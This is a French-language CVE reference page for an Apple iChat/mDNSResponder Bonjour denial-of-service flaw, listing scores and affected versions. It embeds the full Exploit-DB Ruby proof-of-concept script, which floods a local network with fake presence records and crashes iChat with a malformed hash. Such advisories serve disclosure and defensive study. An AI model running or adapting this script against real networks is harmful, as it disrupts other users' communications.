Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 does not check for duplicate entries when adding newly discovered available contacts, which allows remote attackers to cause a denial of service (disrupted communication) via a flood of duplicate _presence._tcp mDNS queries.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 3230
Date de publication : 2007-01-29 23h00 +00:00
Auteur : MoAB
EDB Vérifié : Yes
#!/usr/bin/ruby
# (c) 2006 Lance M. Havok <lmh [at] info-pull.com>
# All Rights Reserved.
# basic proof of concept for MOAB-29-01-2007
#
require 'digest/sha1'
require 'rubygems'
require 'net/dns/mdns-sd'
bugselected = (ARGV[0] || "0").to_i
TMP_ARR = []
DNSSD = Net::DNS::MDNSSD
trap("INT") {
puts "++ Exiting..."
begin
TMP_ARR.each do |o|
o.stop
end
rescue
end
exit
}
#
# This method abuses a design weakness in iChat Bonjour services, allowing an user
# to conduct a denial of service attack against reachable clients by registering multiple
# (fake) _presence records.
#
def oh_gnoes_contact_dos(status_msg = "ekoC stronS reztleS yrraL".reverse,
firstname = 'Pwnies',
lastname = 'Mgheetacek')
available_status = [ "avail", "away" ]
cur_status = available_status[rand(available_status.size)]
# the TXT keys (see http://www.xmpp.org/extensions/xep-0174.html)
keyset = { "status" => cur_status, # - presence availability of the user
"msg" => status_msg, # - user's state
"vc" => "CUAV!", # - user's ability for A/V conferencing
"1st" => firstname, # - first name of the user
"last" => lastname, # - last name of the user
"txtvers" => "1", # - version of the TXT fields supported
"phsh" => Digest::SHA1.hexdigest(rand(0xffffffff).to_s), # - fake SHA-1 hash of icon
"port.p2pj" => "1337" # - Port for link-local communications
# (ignored).
}
count = 0
while true
rand_str = "3891ecniSrevoLyaGeipmaerCterceSkecatPreztleSyrraL".reverse
(rand_str.length-1).downto(1) do |c|
n = rand(c) + 1
rand_str[c], rand_str[n] = rand_str[n], rand_str[c]
end
puts "++ Registering presence #{count}"
# TODO: add NULL record with user avatar icon (ex. Larry Seltzer's taliban bearded face)
dos_handle = DNSSD.register(rand_str, '_presence._tcp', 'local', rand(65535), keyset)
#sleep 40
TMP_ARR << dos_handle
count += 1
end
end
#
# This method causes iChat Agent to raise an exception (SIGTRAP signal) with a crafted TXT key hash.
# Program received signal SIGTRAP, Trace/breakpoint trap.
# 0x9262050b in _NSRaiseError ()
#
def format_dos()
keyset = { "status" => "avail", "msg" => "I'm the Doomed eWook", "vc" => "CUAV!", "1st" => "Larry",
"last" => "Seltzer", "txtvers" => "1", "phsh" => ("\250" * 40),
"port.p2pj" => "1337" }
rand_str = "nabilaTAsAlufrewoPsIyrraL".reverse
(rand_str.length-1).downto(1) do |c|
n = rand(c) + 1
rand_str[c], rand_str[n] = rand_str[n], rand_str[c]
end
dos_handle = DNSSD.register(rand_str, '_presence._tcp', 'local', rand(65535), keyset)
dos_handle.stop
end
#
# Proof of concept method selection below.
#
puts "++ MOAB-29-01-2007: iChat Bonjour Fun"
puts "++ Selected target: #{bugselected}"
case bugselected
when 0
format_dos()
when 1
if (ARGV[1] and ARGV[2] and ARGV[3])
oh_gnoes_contact_dos(ARGV[1], ARGV[2], ARGV[3])
else
oh_gnoes_contact_dos()
end
end
# milw0rm.com [2007-01-30]
Products Mentioned
Configuraton 0
Apple>>Ichat >> Version 3.1.6
Apple>>Instant_message_framework >> Version 428
Apple>>Mdnsresponder >> Version *
- Apple>>Mdnsresponder >> Version - (Open CPE detail)
- Apple>>Mdnsresponder >> Version 22 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 25 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 26.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58.3 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58.5 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58.6 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58.8 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 58.8.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 66.3 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 87 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 98 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 107 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 107.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 107.3 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 107.4 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 107.5 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 107.6 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 108 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 108.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 108.4 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 108.5 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 108.6 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 161.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 164 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 170 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 171.4 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 176.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 176.3 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 212.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 214 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 214.3 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 214.3.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 258.13 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 258.14 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 258.18 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 258.21 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.5 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.5.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.10 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.10.80 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.14 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.16 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 320.18 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 333.10 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 379.27. (Open CPE detail)
- Apple>>Mdnsresponder >> Version 379.27.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 379.32.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 379.37 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 379.38.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 522.1.11 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 522.90.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 522.92.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 541 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 544 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 561.1.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 567 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 576.30.4 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 625.41.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 765.1.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 765.20.4 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 765.30.11 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 765.50.9 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 878.1.1 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 878.20.3 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 878.30.4 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 878.50.17 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 878.70.2 (Open CPE detail)
- Apple>>Mdnsresponder >> Version 878.200.35 (Open CPE detail)
Références
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.